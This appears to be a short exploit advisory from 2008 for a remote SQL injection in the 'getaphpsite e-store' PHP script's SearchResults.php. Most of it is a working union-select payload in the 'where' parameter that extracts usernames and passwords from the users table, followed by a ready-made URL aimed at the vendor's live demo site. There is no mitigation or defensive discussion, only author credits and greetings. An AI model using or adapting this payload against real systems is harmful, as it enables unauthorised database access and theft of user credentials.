getaphpsite e-store suffers from a remote SQL injection vulnerability in SearchResults.php.
0f26275dd7252d6d0215d231852a2e2628f28efeda959d5b4e68b50ad21fa52d
[~] getaphpsite e-store (where) Remote Sql inj
[~]
[~] script: http://www.getaphpsite.com/6.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
Exploit:
http://z0rlu.blogspot.com/script/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc
for demo:
http://www.getaphpsite.com/demos/estore/SearchResults.php?SearchTerm=ZoRLu&where=ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------